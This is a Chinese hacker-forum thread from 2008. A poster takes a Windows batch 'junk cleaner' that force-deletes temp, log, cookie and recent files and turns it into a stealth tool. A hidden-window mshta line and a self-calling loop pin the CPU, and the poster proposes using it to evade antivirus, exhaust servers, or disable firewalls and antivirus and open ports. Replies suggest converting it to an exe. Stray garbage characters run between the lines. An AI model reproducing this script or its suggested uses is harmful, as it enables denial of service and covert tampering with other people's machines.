标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
[打印本页]
作者:
平湖秋月
时间:
2008-9-13 23:51
标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序 说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
# d; W& z f" ?: p0 a" E+ O6 _6 _+ E
a.bat源代码如下:
+ F5 r9 g& | Y- D
+ X7 t+ Z# }. ]* }! a; [: i
7 t) X m7 T3 x* n _! x; g7 O
===可以直接保存改名a.bat=====================
/ X5 u# B! a# ]/ s) z: V; i# g( r
@echo off
) h; Y/ @/ v, z. ^
echo 正在清除系统垃圾文件,请稍等......
$ D4 G; Y" z# V0 J8 r4 j
@del /f /s /q %systemdrive%\*.tmp
% s2 D+ Y o$ V3 I
@del /f /s /q %systemdrive%\*._mp
" U; _; Y1 f" ?9 b% y/ Z2 e" e+ v. H
@del /f /s /q %systemdrive%\*.log
) o0 ]' |. u* F7 M/ Q* p% t w
@del /f /s /q %systemdrive%\*.gid
! p$ k' g( l+ q
@del /f /s /q %systemdrive%\*.chk
) d& R4 Z* ?+ P7 L
@del /f /s /q %systemdrive%\*.old
- C- P1 t6 X; C& \$ e6 h+ g- P
@del /f /s /q %systemdrive%\recycled\*.*
- k2 P. ?/ }$ `0 F- f
@del /f /s /q %windir%\*.bak
( e% j R3 F- B, ^. A% e( D0 d
@del /f /s /q %windir%\prefetch\*.*
$ p; F; f% v4 j5 M
@rd /s /q %windir%\temp & md %windir%\temp
: F+ ~' ]" \: }6 E1 K4 Z$ @& g k9 G
@del /f /q %userprofile%\cookies\*.*
# x5 a9 L' F. R, C6 R7 {
@del /f /q %userprofile%\recent\*.*
2 [: G6 _3 k1 @) k* m
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
( O0 ~" R) ^3 E" c/ T5 p& g
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
. Y6 T, q1 ?& B$ X0 U
@del /f /s /q "%userprofile%\recent\*.*"
T z; \0 ]; V! j+ ^
echo 清除系统LJ完成!
; k1 A. I. x, b
其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:
9 z9 b* l7 Q) A- b8 Z
" K. p8 e9 T& }# a
===可以直接保存改名为a.bat
(一定要是a.bat哦具体说明原因你应该明白吧======
0 e- y; V+ Z: t* e
@echo off
4 E$ d' X, v3 o' o! O( |9 X
if "%1" == "h" goto begin
" ]3 C& I7 S! a7 X! {
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
/ o6 x4 h ]8 g- B' x
:begin
+ r+ O5 n! z6 F
echo 正在清除系统垃圾文件,请稍等......
: M8 S1 o9 ~- j, l2 ?
@@del /f /s /q %systemdrive%\*.tmp
7 z5 [2 m; E0 l7 a/ V" d
@del /f /s /q %systemdrive%\*._mp
: Y0 v, ]6 `4 W/ D$ p
@del /f /s /q %systemdrive%\*.log
* d5 f H2 O4 v- C! T; ~ i
@del /f /s /q %systemdrive%\*.gid
$ b- @. D f8 s3 m* _
@del /f /s /q %systemdrive%\*.chk
3 `6 w0 Q" R) [: Z8 t' [! a
@del /f /s /q %systemdrive%\*.old
* r! o$ w% O2 m& ]
@del /f /s /q %systemdrive%\recycled\*.*
' P% k. M- [ l* M8 J: u8 M
@del /f /s /q %windir%\*.bak
; t, \5 E) j$ B- F* J
@del /f /s /q %windir%\prefetch\*.*
5 R; e. B1 ~% q0 [1 F' q
@rd /s /q %windir%\temp & md %windir%\temp
4 p ?' U" }8 {9 l; j# G
@del /f /q %userprofile%\cookies\*.*
) }1 `, u5 A/ B. ?
@del /f /q %userprofile%\recent\*.*
% C; I0 b9 T% L2 ]! ~
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
' w9 ^; w: F; x* R
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
& X6 l/ v5 Y/ x# ~! B5 u! X
@del /f /s /q "%userprofile%\recent\*.*"
3 V7 H: N/ _$ _- A8 ]8 [
echo 清除系统LJ完成!
C0 x! y0 `' u0 [4 B; T
call a.bat
- Q5 H u( u$ J2 w& t7 X
运行看看!什么效果?
$ S7 s6 N3 P9 a9 u0 q4 c
对话框消失了!打开任务管理器查看显示CPU运用:100% 看进程里面cmd.exe占用CPU:99 本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
# \$ c. G' v! M. i% N- X8 g- Z8 \' s
: h, a) h4 F1 }% v3 {6 W
你说,我们可以利用这个BAT做些什么:
* X$ l! X6 Z- |8 \9 y/ T4 g
9 D s) ]" X7 Y9 |
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
" _7 t6 u0 n7 @8 g! z1 A- ]
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
& {+ m1 h& e5 E9 N& B
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月
作者:
上帝的爱
时间:
2008-9-14 05:03
想法非常不错
作者:
柔肠寸断
时间:
2008-9-14 17:34
打个岔,流氓的应用,呵呵
作者:
柔肠寸断
时间:
2008-9-14 17:38
现在来正经的回答下问题:
# x& }& a# u1 `
1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了
" a/ V+ T1 F, b6 a/ ?
% O# x" ~) \0 m' E
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者:
问道小生
时间:
2008-9-14 19:03
其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
- h% m) K6 O. M3 |! t9 w' N. E
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者:
平湖秋月
时间:
2008-9-15 21:43
楼上的你们说的都有道理 理论上是成立的 我有时间试试看
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2
